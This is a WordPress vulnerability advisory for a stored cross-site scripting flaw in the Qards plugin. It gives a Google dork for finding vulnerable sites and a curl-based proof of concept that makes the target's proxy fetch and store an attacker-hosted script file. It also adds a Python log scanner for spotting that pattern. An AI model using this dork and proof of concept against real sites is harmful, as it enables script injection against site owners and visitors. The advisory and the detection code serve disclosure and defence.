WordPress Plugin Vulnerabilities

Qards - Stored Cross-Site Scripting (XSS)

Description

Google Dork: inurl:"plugins/qards"

Qards gives you an easy way to drag and edit every part and element of your site in the front end; you never have to write any code to change the layout or any other part of the site, as you would the traditional WordPress way.

Proof of Concept

The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
reads the value of the "url" parameter and, using the PHP cURL functions, saves the fetched website's content to a file under /wp-content/plugins/qards/images/ with a filename formatted as follows:

<hash md5>.<mime-type>

On a web server with directory listing enabled, that file is easy to find.
Because the fetched content is stored and served without any sanitization, the generated file suffers from a persistent (stored) XSS vulnerability.

POC:
1. Create a remote file (evil.html) on your web server with the following content:

<script> alert('XSS'); </script>

2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'

3. Browse to http://target/wp-content/plugins/qards/images/ to get the file
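As an added defender-side example (not part of this advisory or of the plugin's code), the following Python script classifies Apache combined-format access-log lines, flagging requests to html2canvasproxy.php whose url parameter does not point at an http(s) image resource, and successful listings of the images/ directory. The log lines are constructed for illustration, and the assumption that legitimate use only fetches raster images follows from what an html2canvas proxy is for.

```python
import os.path
import re
from urllib.parse import parse_qs, urlparse

PROXY_PATH = "/wp-content/plugins/qards/html2canvasproxy.php"
IMAGES_DIR = "/wp-content/plugins/qards/images/"
# Assumption: a legitimate html2canvas proxy only ever needs to fetch raster images.
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".webp"}

# Apache "combined" format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2017:10:01:02 +0000] "GET /wp-content/plugins/qards/html2canvasproxy.php?url=http%3A%2F%2F198.51.100.7%2Fevil.html HTTP/1.1" 200 512 "-" "curl/7.55.1"
203.0.113.5 - - [11/Oct/2017:10:01:09 +0000] "GET /wp-content/plugins/qards/images/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Oct/2017:10:02:30 +0000] "GET /wp-content/plugins/qards/html2canvasproxy.php?url=https%3A%2F%2Fexample.org%2Flogo.png HTTP/1.1" 200 9001 "https://example.org/" "Mozilla/5.0"
192.0.2.11 - - [11/Oct/2017:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return a finding dict for one access-log line, or None when it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlparse(m.group("target"))
    base = {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status")}
    if target.path == PROXY_PATH:
        fetched = parse_qs(target.query).get("url", [""])[0]
        remote = urlparse(fetched)
        ext = os.path.splitext(remote.path)[1].lower()
        # Anything that is not an http(s) URL ending in an image extension can
        # end up stored under images/ as browser-renderable content.
        suspicious = remote.scheme not in ("http", "https") or ext not in IMAGE_EXTS
        kind = "proxy-fetch-non-image" if suspicious else "proxy-fetch"
        return dict(base, kind=kind, url=fetched)
    if target.path == IMAGES_DIR and m.group("status") == "200":
        # A 200 on the bare directory means listing is enabled, which is what
        # lets a visitor locate the stored file.
        return dict(base, kind="images-directory-listing")
    return None


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Running `scan(SAMPLE_LOG)` yields three findings; the first two, from the same client a few seconds apart, are the fetch-then-browse pattern the PoC above describes.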

Affects Plugins

Qards: no known fix

Classification

Type: XSS

Miscellaneous

Submitter: theMiddle
Verified: No

Timeline

Publicly Published: 2017-10-11
Added: 2017-10-17
Last Updated: 2020-10-02
